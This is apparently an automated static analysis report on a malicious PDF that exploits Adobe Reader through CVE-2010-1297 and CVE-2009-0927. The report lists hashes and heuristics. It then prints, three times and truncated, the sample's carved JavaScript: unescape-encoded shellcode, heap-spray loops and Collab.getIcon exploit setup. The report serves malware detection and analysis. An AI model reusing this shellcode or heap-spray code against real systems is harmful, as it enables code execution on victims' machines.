Malicious PDF — malware analysis report

Static analysis result for SHA-256 796f0f938e60fc22…

MALICIOUS

PDF

427.9 KB Created: 2011-04-19 14:23:41 +08:00 Authoring application: Acrobat PDFMaker 9.0 Word 版 (via Acrobat Distiller 9.0.0 (Windows))
MD5: 452703b9292a7a5d45eb224c622d32cf SHA-1: 2786d5ac6a4d5e378c0086acb7a8e19a79692cb2 SHA-256: 796f0f938e60fc22189c6453db86d41b5cb0f2a84be0ff591584267b21af8dfd
424 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript T1566.001 Spearphishing Attachment

This PDF file contains multiple critical heuristic firings indicating exploitation of known vulnerabilities, specifically CVE-2010-1297 (Adobe Flash) and CVE-2009-0927 (Collab.getIcon). The embedded JavaScript is heavily obfuscated but appears to be designed to download and execute a secondary payload. The ML classifier also strongly flagged this as malicious.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9997

Heuristics 11

  • Adobe Flash authplay SWF exploit in PDF — CVE-2010-1297 critical CVE likely CVE_2010_1297_FLASH_RICHMEDIA
    PDF combines RichMedia Flash activation, a crafted SWF with ActionScript prototype/AVM-era markers or the AES-PHP/authplay variant markers, and PDF-side shellcode heap-spray staging. This is the static delivery shape associated with CVE-2010-1297 in Adobe Reader's bundled authplay.dll.
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • RichMedia (Flash) high PDF_RICHMEDIA
    PDF contains /RichMedia (Adobe Flash) which is a historic exploit vector
  • Hex-obfuscated structural name object high PDF_OBFUSCATED_NAME_OBJECT
    A structurally-dangerous PDF name (e.g. /OpenAction, /Launch, /AA, /EmbeddedFile, /SubmitForm) is written with #XX hex escapes to evade string-based scanners. Legitimate producers write these names literally; hex-encoding them is a deliberate obfuscation technique.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdfx/1.3/In PDF document text
    • http://ns.adobe.com/xdp/In PDF document text
    • http://www.xfa.org/schema/xci/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.6/In PDF document text

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
8.swf
8298c90dcffb75747c86dc9458619c17368d5d989325569dee2a57a4af103da3		 pdf-embedded-file PDF EmbeddedFile object 37 at offset 0x68089 2557 bytes
javascript_obj0027_000.js
1e3c145e99484ca7784a40ca9c59aa6e7400472f5d99675fcbdff3e182a6eeee		 pdf-javascript-stream PDF /JS object 27 at offset 0x66B6D 12262 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
var unes = unescape//jfpajg';[]'
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var sc1
for(i=0;i<18000;i++)
sc1=sc1+0x60
var sc2
for(i=0;i<18000;i++)
sc2=sc2+0x60
for(i=0;i<18000;i++)
var sc3
sc3=sc3+0x60
var sc4
for(i=0;i<18000;i++)
sc4=sc4+0x60
var strTempA="\x62\x79\x74e\x54\x6f\x43\x68\x61\x72";
var strTempB="g\x65t\x49"//sgjlsg;slg;
strTempB+="\x63\x6f\x6e";
var strTempC="c\x6fll\x65\x63\x74"//gwwmjhg[lep'lgf;s
strTempC+="\x45\x6d\x61\x69lInfo";


function rep(count,what){
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function myunes(buf) {
          var ret =""
          for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
                  ret = ret+util[strTempA](Number("0x"+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
          }
          return ret;
}
sc1=unes("\x25\x75\x30\x63\x30\x43\x25\x75\x31\x31\x65\x42\x25\x755bfc\x25\x75334b\x25\x7566c9\x25\x752eb9\x25\x758\x30\x303"+
"\x25\x750b34\x25\x75e28f\x25\x75ebfa\x25\x75e805\x25\x75ffeb\x25\x75ffff\x25\x75bf67\x25\x758f8f" +
"%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18" +
"%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05" +
"%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36" +
"%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5" +
"%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5" +
"%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f" +
"%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804" +
"%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764" +
"%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f" +
"%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63" +
"%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa" +
"%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9" +
"%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70" +
"%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68" )
;

sc2=unes("%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02" +
"%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa" +
"%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f" +
"%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04" +
"%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca" +
"%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d" +
"%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f" +
"%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070" +
"%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137" +
"%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b" +
"%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2" +
"%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d" +
"%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f" 
)
sc3=unes("%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07" +
"%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f" +
"%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f" +
"%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e" +
"%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b" +
"%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80" +
"%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66" +
"%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64" +
"%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70" +
"%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e" +
"%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70" +
"%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8" +
"%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f" 
)
sc4=unes("%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6" +
"%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848" +
"%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83" +
"%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f" +
"%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df" +
"%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb" +
"%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04" +
"%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240" +
"%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964" +
"%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d" +
"%u064f%ud065%ud2d1%u4dd4%u8f87");
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function exp8() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
whi
... (truncated)
generic_stage_recovery_000.js
e9c0ab22ec6616cd72aaf5cf98b1cee09a200a6374be7792fa36c690b84725d0		 deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 27 at offset 0x66B6D 10856 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
var unes = unescape//jfpajg';[]'
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var sc1
for(i=0;i<18000;i++)
sc1=sc1+0x60
var sc2
for(i=0;i<18000;i++)
sc2=sc2+0x60
for(i=0;i<18000;i++)
var sc3
sc3=sc3+0x60
var sc4
for(i=0;i<18000;i++)
sc4=sc4+0x60
var strTempA="\x62\x79\x74e\x54\x6f\x43\x68\x61\x72";
var strTempB="g\x65t\x49"//sgjlsg;slg;
strTempB+="\x63\x6f\x6e";
var strTempC="c\x6fll\x65\x63\x74"//gwwmjhg[lep'lgf;s
strTempC+="\x45\x6d\x61\x69lInfo";


function rep(count,what){
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function myunes(buf) {
          var ret =""
          for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
                  ret = ret+util[strTempA](Number("0x"+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
          }
          return ret;
}
sc1=unes("%u0c0C%u11eB%u5bfc%u334b%u66c9%u2eb9%u8003%u0b34%ue28f%uebfa%ue805%uffeb%uffff%ubf67%u8f8f%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68" )
;

sc2=unes("%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f" 
)
sc3=unes("%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f" 
)
sc4=unes("%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d%u064f%ud065%ud2d1%u4dd4%u8f87");
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function exp8() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\
... (truncated)
js_property_alias_stage_000.js
b7b13616d51f57827ee1c85763327eb8b56641e61c3adcb69dd3d7f1b2eb87d9		 deobfuscated-js JavaScript property alias normalized stage at offset 0x66B6D 11328 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
var unes = unescape//jfpajg';[]'
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var sc1
for(i=0;i<18000;i++)
sc1=sc1+0x60
var sc2
for(i=0;i<18000;i++)
sc2=sc2+0x60
for(i=0;i<18000;i++)
var sc3
sc3=sc3+0x60
var sc4
for(i=0;i<18000;i++)
sc4=sc4+0x60
var strTempA="byteToChar";
var strTempB="getI"//sgjlsg;slg;
strTempB+="con";
var strTempC="collect"//gwwmjhg[lep'lgf;s
strTempC+="EmailInfo";


function rep(count,what){
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function myunes(buf) {
          var ret =""
          for (var x=0;x < buf["length"]; x+=2) {
                  ret = ret+util[strTempA](Number("0x"+buf["substr"](x,2)));//
          }
          return ret;
}
sc1=unes("%u0c0C%u11eB%u5bfc%u334b%u66c9%u2eb9%u8003"+
"%u0b34%ue28f%uebfa%ue805%uffeb%uffff%ubf67%u8f8f" +
"%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18" +
"%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05" +
"%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36" +
"%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5" +
"%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5" +
"%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f" +
"%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804" +
"%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764" +
"%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f" +
"%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63" +
"%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa" +
"%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9" +
"%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70" +
"%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68" )
;

sc2=unes("%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02" +
"%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa" +
"%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f" +
"%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04" +
"%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca" +
"%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d" +
"%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f" +
"%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070" +
"%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137" +
"%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b" +
"%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2" +
"%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d" +
"%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f" 
)
sc3=unes("%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07" +
"%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f" +
"%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f" +
"%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e" +
"%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b" +
"%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80" +
"%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66" +
"%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64" +
"%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70" +
"%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e" +
"%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70" +
"%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8" +
"%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f" 
)
sc4=unes("%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6" +
"%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848" +
"%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83" +
"%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f" +
"%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df" +
"%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb" +
"%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04" +
"%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240" +
"%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964" +
"%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d" +
"%u064f%ud065%ud2d1%u4dd4%u8f87");
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function exp8() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="getIcon";
wap = 0x24+blah["length"]
while (bbk["length"]<wap) bbk+=bbk;
fillbk = bbk["substring"](0, wap);
bk = bbk["substring"](0, bbk["length"]-wap);
while(bk["length"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.